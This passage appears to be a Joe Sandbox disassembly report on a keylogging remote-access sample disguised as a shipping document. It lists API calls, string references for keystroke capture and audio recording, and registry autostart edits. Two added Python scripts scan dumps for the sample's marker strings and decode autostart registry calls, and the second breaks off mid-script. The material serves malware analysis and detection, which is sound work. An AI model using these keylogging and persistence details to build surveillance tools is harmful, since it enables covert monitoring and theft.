                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                      • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                      • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                      • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                      • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                      • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                      • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                      • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 3919263394-0
                                                      • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                      • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                      • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                      • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                      APIs
                                                      • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                      • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                      • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                      • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem
                                                      • String ID:
                                                      • API String ID: 4116985748-0
                                                      • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                      • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                      • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                      • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                      APIs
                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleOpenProcess
                                                      • String ID:
                                                      • API String ID: 39102293-0
                                                      • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                      • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                      • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                      • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                      • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                      • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                      • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountEventTick
                                                      • String ID: >G
                                                      • API String ID: 180926312-1296849874
                                                      • Opcode ID: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                      • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                      • Opcode Fuzzy Hash: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                      • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID: $fD
                                                      • API String ID: 1807457897-3092946448
                                                      • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                      • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                      • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                      • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                      • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                      • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                      • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 481472006-1507639952
                                                      • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                      • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                      • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                      • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                      APIs
                                                      • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: | $%02i:%02i:%02i:%03i
                                                      • API String ID: 481472006-2430845779
                                                      • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                      • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                      • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                      • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: alarm.wav$xIG
                                                      • API String ID: 1174141254-4080756945
                                                      • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                      • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                      • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                      • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                      APIs
                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                      • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                      • String ID: Online Keylogger Stopped
                                                      • API String ID: 1623830855-1496645233
                                                      • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                      • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                      • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                      • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                      APIs
                                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferHeaderPrepare
                                                      • String ID: T=G
                                                      • API String ID: 2315374483-379896819
                                                      • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                      • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                      • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                      • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                      APIs
                                                      • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocaleValid
                                                      • String ID: IsValidLocaleName$j=D
                                                      • API String ID: 1901932003-3128777819
                                                      • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                      • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                      • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                      • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: T=G$T=G
                                                      • API String ID: 3519838083-3732185208
                                                      • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                      • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                      • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                      • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                      APIs
                                                      • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                        • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                        • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                        • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                        • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                        • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                        • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                        • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                      • String ID: [AltL]$[AltR]
                                                      • API String ID: 2738857842-2658077756
                                                      • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                      • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                      • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                      • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                      APIs
                                                      • _free.LIBCMT ref: 00448825
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID: `@$`@
                                                      • API String ID: 1353095263-20545824
                                                      • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                      • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                      • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                      • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                      APIs
                                                      • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State
                                                      • String ID: [CtrlL]$[CtrlR]
                                                      • API String ID: 1649606143-2446555240
                                                      • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                      • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                      • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                      • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
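Triage scanner for the marker strings referenced in the blocks above (the "KeepAlive | Enabled | Timeout: " banner, "Offline Keylogger Started" / "Online Keylogger Stopped", the "%02i:%02i:%02i:%03i" timestamp format, "alarm.wav" and the "[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]" key tags). This is an added example, not Joe Sandbox output and not the sample's own code. The point it makes: these strings are passed to wide-character APIs (wsprintfW, PathFileExistsW), so in a file or memory dump they sit as UTF-16LE and a plain `strings` run without `-el` misses them; the scanner searches both encodings and reports offsets. The demo blob, the marker threshold and the string_at helper are constructed for the example.

```python
"""Scan a file or memory dump for the marker strings referenced above.

Added example; not Joe Sandbox output and not the sample's code. The string
references in the listing are formatted with wide-character APIs, so in a
dump they are UTF-16LE; `strings` without -el does not show them. Both
encodings are searched. The blob built below is constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Marker strings copied verbatim from the string references in the listing.
MARKERS = (
    "KeepAlive | Enabled | Timeout: ",
    "Offline Keylogger Started",
    "Online Keylogger Stopped",
    "%02i:%02i:%02i:%03i",
    "alarm.wav",
    "[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]",
)


@dataclass(frozen=True)
class Hit:
    offset: int
    encoding: str   # "ascii" or "utf-16-le"
    marker: str


# One bytes regex per (marker, encoding); re.escape handles the NUL bytes
# that UTF-16LE introduces between characters.
_PATTERNS = [
    (m, enc, re.compile(re.escape(m.encode(enc))))
    for m in MARKERS for enc in ("ascii", "utf-16-le")
]


def scan(blob: bytes) -> List[Hit]:
    """Return every marker occurrence in blob, in offset order."""
    hits = [Hit(mt.start(), enc, m)
            for m, enc, pat in _PATTERNS for mt in pat.finditer(blob)]
    return sorted(hits, key=lambda h: (h.offset, h.encoding))


def string_at(blob: bytes, hit: Hit, extra_chars: int = 32) -> str:
    """Decode the NUL-terminated string that starts at the hit, reading up to
    extra_chars past the marker so the value that follows a banner (for the
    keep-alive line, the timeout) is visible to the analyst."""
    width = 2 if hit.encoding == "utf-16-le" else 1
    chunk = blob[hit.offset:hit.offset + width * (len(hit.marker) + extra_chars)]
    if width == 2 and len(chunk) % 2:
        chunk = chunk[:-1]                      # keep code units aligned
    return chunk.decode(hit.encoding, errors="replace").split("\x00", 1)[0]


def looks_like_family(hits: Iterable[Hit], min_distinct: int = 3) -> bool:
    """Triage heuristic: a lone '[CtrlL]' is generic, several distinct markers
    in one image are not. The threshold is an assumption; tune it locally."""
    return len({h.marker for h in hits}) >= min_distinct


def build_sample() -> bytes:
    """Constructed demo blob (not a real dump): filler bytes around markers in
    the UTF-16LE form a wide-API binary holds, plus one narrow copy to show
    that both encodings are found."""
    def wide(s: str) -> bytes:
        return s.encode("utf-16-le") + b"\x00\x00"
    junk = b"MZ" + bytes(range(0x90, 0xA0)) * 2
    return (junk + wide("KeepAlive | Enabled | Timeout: 30") + junk
            + wide("Offline Keylogger Started") + junk
            + b"alarm.wav\x00" + junk
            + wide("[CtrlL]") + junk)


if __name__ == "__main__":
    blob = build_sample()
    found = scan(blob)
    for h in found:
        print(f"0x{h.offset:06x} {h.encoding:<9} {string_at(blob, h)!r}")
    print("family-like:", looks_like_family(found))
```

Run it against a process dump or the dropped executable instead of build_sample() to see which of the listed strings survive in memory; wide hits that ASCII-only tooling would have missed show up with the `utf-16-le` tag.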
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteOpenValue
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                      • API String ID: 2654517830-1051519024
                                                      • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                      • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                      • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                      • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
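The function above is the one registry-touching routine in this listing worth decoding by hand: the first argument to RegOpenKeyExW, 80000002, is the predefined handle HKEY_LOCAL_MACHINE; the subkey is Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, a logon autostart location that Explorer processes alongside the ordinary Run key; and the samDesired argument 00000002 is KEY_SET_VALUE, so the key is opened for modification, not inspection, and the very next call is RegDeleteValueW. The small Python script below is an added example (not part of the Joe Sandbox report) that parses API lines in this listing's format, decodes the hive handle and access mask, and flags opens of known autostart keys together with the value-modifying calls that follow them. The sample input is constructed from the lines above plus two unrelated calls; the set of autostart keys is a deliberately short subset, and the argument positions assume the documented RegOpenKeyEx/RegCreateKeyEx prototypes (the sandbox prints extra stack slots after the real arguments, which the index-based decoding ignores).

```python
import re
from dataclasses import dataclass

# Constructed sample: API lines in the format of a Joe Sandbox IDA-plugin
# function listing (one bullet per call, optional argument list, then "ref: <addr>").
SAMPLE_API_LINES = r"""
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
• RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?), ref: 0043FAF4
• GetLastError.KERNEL32 ref: 0043FB02
"""

# Predefined root-key handles (winreg.h); 80000002 in the listing is HKLM.
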